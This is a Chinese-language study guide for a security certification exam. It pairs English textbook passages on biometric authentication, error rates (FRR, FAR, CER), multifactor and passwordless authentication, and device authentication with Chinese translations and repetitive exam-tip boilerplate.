密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

问责依赖识别、认证、授权、审计和记账共同工作。

Step-by-step、SOP 常对应 procedure。

哈希本身不提供机密性;它主要用于完整性校验。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
问责性 问责性要求能把行为绑定到具体主体。
程序 程序是一步一步怎么做。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
身份 身份是主体在系统中的标识。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 21 / PDF P937

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

geography), and voice patterns: Fingerprints Fingerprints are the visible patterns on the fingers and thumbs of people. They are unique to an individual and have been used for decades in physical security for identification. Fingerprints have loops, whorls, ridges, and bifurcations (also called minutiae), and fingerprint readers match the minutiae to data within a database. Fingerprint readers are commonly used on laptop computers, keyboards, mice, security keys, and USB flash drives to identify and authenticate users. It usually takes less than a minute to capture a user's fingerprint during the registration process.

Face Scans Face scans use the geometric patterns of faces for detection and recognition. Many smartphone, tablet, and computer operating systems support face identification to unlock the device. Casinos use it to identify card cheats. Law enforcement agencies have been using it to catch criminals at borders and in airports. Face scans are also used to identify and authenticate people before allowing them to access secure spaces such as a secure vault. Retina Scans Retina scans focus on the pattern of blood vessels at the back of the eye. They are the most accurate form of biometric authentication and can differentiate between identical twins.

However, some privacy proponents object to their use because they can reveal medical conditions, such as high blood pressure and pregnancy. Additionally, retina scanners typically require users to be as close as three inches from the scanner. Iris Scans Focusing on the colored area around the pupil, iris scans are the second-most accurate form of biometric authentication. Like the retina, the iris remains relatively unchanged throughout a person's life (barring eye damage or illness). Users consider iris scans less intrusive than retina scans because scans can occur from distances of 20 to 40 feet. However, some scanners can be fooled with a high-quality image in place of a person's eye.

Additionally, the accuracy of iris scans may be affected by changes in lighting and the usage of some glasses and contact lenses. Palm Scans Palm scanners scan the palm of the hand for identification. They use near-infrared light to measure vein patterns in the palm, which are as unique as fingerprints. Individuals simply place their palm over a scanner for a few seconds during the registration process. Later, they place their hand over the scanner again for identification. For example, some testing providers use palm vein readers to prevent people from taking exams for others and ensure that the same person reenters the testing room after a break.

中文直译 / 整理

地理学),以及语音模式: 指纹 指纹 是人手指和拇指上可见的图案。 它们对每个人都是唯一的,并且几十 年来一直用于物理安全中的身份识别。 指纹具有环形、漩涡、脊线和分叉(也称 为细节特征),指纹读取器通过匹配这些细节特征与数据库中的数据来进行识别。 指纹读取器通常用于笔记本电脑、键盘、鼠标、安全密钥和USB闪存驱动器,以 识别和验证用户。 在注册过程中,通常不到一分钟即可捕获用户的指纹。 面部扫描 面部扫描 利用面部的几何图案进行检测和识别。 许多智能手机、平板 电脑和计算机操作系统都支持面部识别以解锁设备。 赌场使用它来识别出老千。 执法机构一直在使用它在边境和机场抓捕罪犯。 面部扫描还用于在允许人们进入 安全区域(如保险库)之前识别和验证其身份。 视网膜扫描 视网膜扫描 专注于眼睛后部血管的图案。 它们是目前最准确的生物 识别认证方式,能够区分同卵双胞胎。 然而,一些隐私倡导者反对使用它们, 因为它们可能揭示医疗状况,如高血压和怀孕。 此外,视网膜扫描仪通常要求 用户距离扫描仪不超过三英寸。 虹膜扫描 聚焦于瞳孔周围的有色区域,虹膜扫描 是第二准确的生物识别认证方 式。

与视网膜类似,虹膜在人的一生中基本保持不变(眼部受伤或患病除外)。 用户认为虹膜扫描比视网膜扫描侵入性更小,因为扫描可在20至40英尺的距离外 进行。 然而,一些扫描仪可能通过高质量的眼部图像欺骗。 此外,虹膜扫描的准 确性可能受到光照变化以及某些眼镜和隐形眼镜使用的影响。 手掌扫描 手掌扫描仪 通过扫描手掌进行身份识别。 它们使用近红外光测量手掌 中的静脉图案,这些图案与指纹一样独特。 在注册过程中,用户只需将手掌放在 扫描仪上几秒钟。 之后,他们再次将手放在扫描仪上进行身份识别。 例如,一些 测试提供商使用掌静脉读取器来防止他人代考,并确保同一个人在休息后重新进 入测试室。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

身份:身份是主体在系统中的标识。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

身份管理题要区分识别、认证、授权、审计。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
身份 身份是主体在系统中的标识。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 22 / PDF P938

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Voice Pattern Recognition This type of biometric authentication relies on the characteristics of a person's speaking voice, known as a voiceprint. The user speaks a specific phrase, which is recorded by the authentication system. To authenticate, they repeat the same phrase, and it is compared to the original. Voice pattern recognition is sometimes used as an additional authentication mechanism but is rarely used by itself. Speech recognition is commonly confused with voice pattern recognition, but they are different. Speech recognition software, such as dictation software, extracts communications from sound.

In other words, voice pattern recognition differentiates between one voice and another for identification or authentication, whereas speech recognition differentiates between words with any person's voice. The use of biometrics promises universally unique identification for every person on the planet. Unfortunately, biometric technology has yet to live up to this promise. However, technologies that focus on physical characteristics are very useful for authentication. Biometric Factor Error Ratings The most important aspect of a biometric device is its accuracy.

When using biometrics for identification, a biometric device must detect minute differences in information, such as variations in the blood vessels in a person's retina or differences in a person's veins in their palm. Because most people are similar, biometric methods often result in false negative and false positive authentications. Biometric devices are rated for performance by examining the different types of errors they produce: False Rejection Rate A false rejection occurs when an authentication system does not authenticate a valid user. As an example, say Dawn has registered her fingerprint and used it for authentication previously.

Imagine that she uses her fingerprint to authenticate herself today, but the system incorrectly rejects her fingerprint, indicating it isn't valid. This is sometimes called a false negative authentication. The ratio of false rejections to valid authentications is known as the false rejection rate (FRR). False rejection is sometimes called a Type I error.

中文直译 / 整理

语音模式识别 这种生物特征认证依赖于人的说话声音特征,称为 声纹。 用户说 出一个特定短语,该短语由认证系统录制。 在认证时,用户重复相同的短语,并 与原始录音进行比对。 语音模式 识别有时用作额外的认证机制,但很少单独使 用。 语音识别常与语音模式识别相混淆,但二者不同。 语音识别软件(如 语音输入软件)从声音中提取通信内容。 换句话说,语音模式识别用于区 分不同人的声音以进行身份识别或认证,而语音识别则用于区分任何人的 声音所发出的词语。 生物识别技术有望为地球上每个人提供独一无二的识别方式。 然而,生物识别 技术尚未实现这一承诺。 不过,专注于生理特征的技术在认证方面非常有用。 生物识别因子错误率评级 生物识别设备最重要的方面是其准确性。 在使用生物识别技术进行身份识别时, 设备必须检测信息中的微小差异,例如人视网膜血管的变异或手掌静脉的差异。 由于大多数人相似,生物识别方法常常导致错误的拒识和错误的误识。 生物识 别设备的性能通过分析其产生的不同类型错误来评定: 错误拒绝率 当认证系统未能识别合法用户时,会发生错误拒绝。 例如, Dawn 已注册她的指纹并曾用其进行认证。

假设她今天再次使用指纹进行认证, 但系统错误地拒绝了她的指纹,认为其无效。 这有时被称为错误负向认证。 错 误拒绝次数与合法认证次数的比率称为 错误拒绝率(FRR)。 错误拒绝有时也称 为 第一类错误。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

身份:身份是主体在系统中的标识。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

网络题先定位层次,再判断协议、设备或攻击位置。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 23 / PDF P939

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

False Acceptance Rate A false acceptance occurs when an authentication system authenticates someone incorrectly. This is also known as a false positive authentication. As an example, imagine that Joe doesn't have an account and hasn't registered his fingerprint. However, he uses his fingerprint to authenticate, and the system recognizes him. This is a false positive or a false acceptance. The ratio of false positives to valid authentications is the false acceptance rate (FAR). False acceptance is sometimes called a Type II error. Most biometric devices have a sensitivity adjustment. When a biometric device is too sensitive, false rejections (false negatives) are more common.

When a biometric device is not sensitive enough, false acceptances (false positives) are more common. You can compare the overall quality of biometric devices with the crossover error rate (CER), also known as the equal error rate (ERR). Figure 13.3 shows the FRR and FAR percentages when a device is set to different sensitivity levels. The point where the FRR and FAR percentages are equal is the CER, and the CER is used as a standard assessment value to compare the accuracy of different biometric devices. Devices with lower CERs are more accurate than devices with higher CERs.

中文直译 / 整理

错误接受率 当认证系统错误地认证了非合法用户时,会发生错误接受。 这也被 称为错误正向认证。 例如,假设 Joe 没有账户,也未注册他的指纹,但他使用指 纹进行认证,而系统却识别了他。 这是一种错误正向或错误接受。 错误正向次数 与合法认证次数的比率是 错误接受率(FAR)。 错误接受有时也称为 第二类错误。 大多数生物识别设备都有灵敏度调节功能。 当生物识别设备过于敏感时,误 拒(假阴性)更为常见; 当生物识别设备不够敏感时,误识(假阳性)更为 常见。 您可以使用交叉错误率(CER)来比较生物识别设备的整体质量,该指标也称 为等错误率(ERR)。 图13.3展示了设备在不同灵敏度设置下的FRR和FAR百 分比。 当FRR和FAR百分比相等时,该点即为CER,CER被用作比较不同生物 识别设备准确性的标准评估值。 CER值较低的设备比CER值较高的设备更准确。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

标准:标准给出必须满足的最低要求。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

Minimum level、mandatory requirement 常对应 standard。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
标准 标准给出必须满足的最低要求。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 24 / PDF P940

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

FIGURE 13.3 Graph of FRR and FAR errors indicating the CER point It's not necessary, and often not desirable, to operate a device with the sensitivity set at the CER level. For example, an organization may use a facial recognition system to allow or deny access to a secure area because they want to ensure that unauthorized individuals are never granted access. In this case, the organization would set the sensitivity very high, so there is little chance of a false acceptance (false positive). This may result in more false rejections (false negatives), but a false rejection is more acceptable than a false acceptance in this scenario.

Biometric Registration Biometric devices can be ineffective or unacceptable due to factors known as enrollment time, throughput rate, and acceptance. For a biometric device to work as an identification or authentication mechanism, enrollment (or

中文直译 / 整理

图 13.3 表示CER点的FRR和FAR错误曲线 将设备的灵敏度设置为CER水平并非必要,通常也不理想。 例如,一个组织可 能使用面部识别系统来允许或拒绝人员进入安全区域,因为他们希望确保未经 授权的人员绝不会被授予访问权限。 在这种情况下,组织会将灵敏度设置得非 常高,以尽量减少错误接受(假阳性)的可能性。 这可能会导致更多的错误拒 绝(假阴性),但在这种场景下,错误拒绝比错误接受更可接受。 生物特征注册 由于注册时间、吞吐率和接受度等因素,生物识别设备可能无效或不可接受。 要使生物识别设备作为身份识别或身份验证机制工作,必须进行注册(或

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

网络题先定位层次,再判断协议、设备或攻击位置。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
身份 身份是主体在系统中的标识。
学习单元 25 / PDF P941

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

registration) must occur. During enrollment, a subject's biometric factor is sampled and stored in the device's database. This stored sample of a biometric factor is the reference profile (also known as a reference template). The time required to scan and store a biometric factor depends on which physical or performance characteristic is measured. Users are less willing to accept the inconvenience of biometric methods that take a long time. In general, enrollment times over 2 minutes are unacceptable.

If you use a biometric characteristic that changes over time, such as a person's voice tones, facial hair, or signature pattern, users must enroll again at regular intervals, adding an inconvenience. The throughput rate is the amount of time the system requires to scan a subject and approve or deny access. The more complex or detailed a biometric characteristic, the longer processing takes. Subjects typically accept a throughput rate of about 6 seconds or faster. Multifactor Authentication (MFA) Multifactor authentication (MFA) is any authentication using two or more factors. Two-factor authentication (2FA) requires two different proofs of identity to provide authentication.

In contrast, any authentication method using only one factor is single-factor authentication. For example, smartcards typically require users to insert their card into a reader and enter a PIN. The smartcard is in the something you have factor, and the PIN is in the something you know factor. As a general rule, additional factors result in more secure authentication. Multifactor authentication must use multiple types or factors, such as the something you know factor and the something you have factor. In contrast, requiring users to enter a password and a PIN is not multifactor authentication because both methods are from a single authentication factor (something you know).

When two authentication methods of the same factor are used together, the authentication strength is no greater than it would be if just one method was used because the same attack that could steal or obtain one could also obtain the other. For example, using two passwords together is no more secure than

中文直译 / 整理

注册)。 在注册过程中,会采集受试者的生物特征并存储在设备的数据库中。 该生物特征的存储样本称为参考档案(也称为参考模板)。 扫描和存储生物特征所需的时间取决于测量的是哪种生理或性能特征。 用户 不太愿意接受耗时较长的生物识别方法带来的不便。 通常,注册时间超过2分 钟是不可接受的。 如果你使用的是随时间变化的生物特征,例如人的语音音 调、面部毛发或签名模式,用户必须定期重新注册,这会增加不便。 吞吐率是指系统扫描受试者并批准或拒绝访问所需的时间。 生物特征越复杂或 越详细,处理时间就越长。 受试者通常能接受约6秒或更短的吞吐率。 多因素认证(MFA) 多因素认证(MFA)是指使用两个或更多因素的任何认证方式。 双因素认证 (2FA)要求提供两种不同的身份证明以完成认证。 相比之下,仅使用一个因 素的任何认证方法称为单因素认证。 例如,智能卡通常要求用户将卡片插入读 卡器并输入PIN码。 智能卡属于“你拥有的东西”因素,而PIN码属于“你知道 的东西”因素。 一般而言,增加因素会提高认证的安全性。 多因素身份验证必须使用多种类型或因素,例如“你知道的事物”因 素和“你拥有的事物”因素。

相反,要求用户输入密码和PIN码并非多因 素身份验证,因为这两种方法都属于同一类身份验证因素(你知道的事物)。 当同时使用两种相同因素的认证方法时,其认证强度并不会高于仅使用一种方 法,因为能够窃取或获取其中一种方法的攻击同样也能获取另一种。 例如,同 时使用两个密码的安全性并不高于

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

身份:身份是主体在系统中的标识。

多因素认证:MFA 使用至少两类不同认证因素,提高认证可信度。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

身份管理题要区分识别、认证、授权、审计。

知道的、拥有的、固有的、所处位置、行为特征是常见因素。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
身份 身份是主体在系统中的标识。
多因素认证 MFA 使用至少两类不同认证因素,提高认证可信度。
学习单元 26 / PDF P942

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

using a single password because a password-cracking attempt could discover both in a single successful attack. In contrast, when two or more different factors are employed, two or more different attack methods must succeed to collect all relevant authentication elements. For example, suppose a token, a password, and a biometric factor are all used for authentication. In that case, a physical theft, a password crack, and a biometric duplication attack must all succeed simultaneously to allow an intruder to gain entry into the system. NIST Deprecates SMS for 2FA Another method of two-factor authentication uses the Short Message Service (SMS) to send users a text message with the OTP.

This method is better than just using a password, but it has problems. NIST SP 800-63B has pointed out several vulnerabilities with using SMS for two-step authentication and deprecated its use for federal agencies. Smartphones and tablets display texts on the lock screen without the user logging on. If an attacker stole the smartphone or tablet, they would have access to the OTP sent via SMS. Attackers may be able to convince a mobile operator to redirect SMS messages to an attacker's devices. This is sometimes possible via subscriber identity module (SIM) card fraud. If successful, attackers may be able to intercept SMS messages.

Passwordless Authentication There is a growing trend toward passwordless authentication. As mentioned previously, static passwords are the weakest form of authentication. Worse, as IT departments attempt to force users into creating longer and more complex passwords with expiration dates, users engage in risky behavior such as writing their passwords down or creating weaker passwords that are easier to remember. Passwordless authentication allows users to log into systems without entering a password (or any other memorized secret). As an example, many smartphones and tablets support biometric authentication.

If you've enabled facial recognition on your smartphone, all you need to do is look at it to get

中文直译 / 整理

仅使用一个密码,因为一次成功的密码破解攻击就可能同时发现这两个密码。 相比之下,当使用两个或更多不同的因素时,必须同时成功实施两种或多种不 同的攻击方法才能收集所有相关的身份验证元素。 例如,假设身份验证同时使 用了令牌、密码和生物特征因素,那么攻击者必须同时成功实施物理窃取、密 码破解和生物特征复制攻击,才能进入系统。 NIST 废弃 SMS 用于双因素认证 另一种双因素认证方法使用短消息服务(SMS)向用户发送包含一次性密 码(OTP)的短信。 这种方法优于仅使用密码,但存在一些问题。 NIST SP 800‑63B 指出,使用 SMS 进行两步认证存在多种漏洞,并已建议联邦 机构停止使用该方法。 智能手机和平板电脑在用户未登录的情况下也会在锁屏上显示短信内容。 如果 攻击者窃取了智能手机或平板电脑,他们便可获取通过 SMS 发送的 OTP。 攻击者可能说服移动运营商将 SMS 消息重定向到其设备。 这有时可通过用 户身份模块(SIM)卡欺诈实现。 如果成功,攻击者便可截获 SMS 消息。 无密码认证 无密码认证正成为一种日益增长的趋势。 如前所述,静态密码是最薄弱的认证 形式。

更糟糕的是,当IT部门试图强制用户创建更长、更复杂的密码并设置过 期日期时,用户会采取危险行为,例如将密码写下来,或创建更简单、更容易 记住的弱密码。 无密码认证允许用户在不输入密码(或任何其他记忆中的密钥)的情况下登录 系统。 例如,许多智能手机和平板电脑都支持生物识别认证。 如果您已在智能 手机上启用了面部识别,您只需看一眼设备即可

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

NIST:NIST 提供美国常用安全标准、框架和指南。

身份:身份是主体在系统中的标识。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
NIST NIST 提供美国常用安全标准、框架和指南。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 27 / PDF P943

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

beyond the login screen. Similarly, if you've enabled fingerprint recognition on a tablet, all you need to do is place your finger on the sensor. Once you get past the logon screen, many internal applications use the same authentication methods to access sensitive data. As an example, imagine you use an app on a tablet to access an online bank. The first time you access it, the app prompts you to save your credentials, and you agree. The next time you access the app, the app prompts you to authenticate with your fingerprint again. The Fast Identity Online (FIDO) Alliance is an open industry association with a stated mission of reducing the over-reliance on passwords.

FIDO has created recommended frameworks and protocol standards for passwordless authentication. These revolve around the use of hardware passkeys, such as the YubiKey device shown in Figure 13.4. FIGURE 13.4 YubiKey passkey Device Authentication

中文直译 / 整理

进入登录界面之外。 同样,如果您已在平板电脑上启用了指纹识别,您只需将手 指放在传感器上即可。 一旦越过登录屏幕,许多内部应用程序都使用相同的认证方法来访问敏感数据。 例如,假设您在平板电脑上使用一个应用程序访问在线银行。 首次访问时,该 应用会提示您保存凭据,您同意了。 下次访问该应用时,应用会再次提示您使 用指纹进行认证。 FIDO(快速身份在线)联盟是一个开放的行业组织,其宗旨是减少对密码的过 度依赖。 FIDO已创建了无密码身份验证的推荐框架和协议标准,这些标准围绕 使用硬件密钥(如图图13.4所示的YubiKey设备)展开。 图 13.4 YubiKey 密钥 设备认证

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 28 / PDF P944

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Historically, users have only been able to log into a network from a companyowned system such as a desktop PC. For example, in a Windows domain, user computers join the domain and have computer accounts (sometimes called system accounts) and passwords similar to user accounts and passwords. If the computer hasn't joined the domain, or its credentials are out of sync with a domain controller, users cannot log on from the computer. Today, more and more employees are bringing their own mobile devices to work and hooking them up to the network. Some organizations embrace this but implement security policies as a measure of control.

These devices aren't necessarily able to join a domain, but it is possible to implement device identification and authentication methods. One method is device fingerprinting. Users can register their devices with the organization and associate them with their user accounts. During registration, a device authentication system captures the characteristics of the device. This is often accomplished by having the user access a web page with the device. The registration system then identifies the device using attributes such as the operating system and version, web browser, browser fonts, browser plug-ins, time zone, data storage, screen resolution, cookie settings, and HTTP headers.

When the user logs on from the device, the authentication system checks the user account for a registered device. It then verifies the characteristics of the user's device with the registered device. Even though some of these characteristics change over time, this has proven to be a successful device authentication method. As mentioned previously, many MDM systems use context-aware authentication methods to identify devices. They typically work with network access control (NAC) systems to check the device's health and grant or restrict access based on requirements configured within the NAC system. 802.1X is another method used for device authentication.

It can be used for port-based authentication on some routers and switches. Additionally, it is often used with wireless systems, forcing users to log on with an account before being granted access to a network. Many MDM and NAC solutions implement 802.1X solutions to control user access from mobile devices. If the device or user cannot authenticate through the 802.1X system, they cannot access the network. Service Authentication

中文直译 / 整理

历史上,用户只能从公司拥有的系统(如台式机)登录网络。 例如,在 Windows域中,用户计算机加入域后会拥有计算机账户(有时称为系统账户) 和类似用户账户的密码。 如果计算机未加入域,或其凭证与域控制器不同步, 则用户无法从该计算机登录。 如今,越来越多的员工将个人移动设备带入工作场所并将其连接到网络。 一些 组织对此持欢迎态度,但同时实施安全策略以进行控制。 这些设备不一定能加 入域,但可以实现设备识别和身份验证方法。 其中一种方法是设备指纹识别。 用户可以向组织注册其设备,并将其与用户账 户关联。 在注册过程中,设备身份验证系统会捕获设备的特征。 这通常通过让 用户使用该设备访问网页来完成。 注册系统随后利用操作系统及其版本、网页 浏览器、浏览器字体、浏览器插件、时区、数据存储、屏幕分辨率、Cookie 设 置和 HTTP 头等属性识别设备。 当用户从该设备登录时,身份验证系统会检查用户账户中是否存在已注册的设 备,并将用户设备的特征与注册的设备特征进行比对。 尽管这些特征中的一部 分会随时间变化,但该方法已被证明是一种成功的设备身份验证方式。 如前所述,许多MDM系统使用上下文感知的身份验证方法来识别设备。

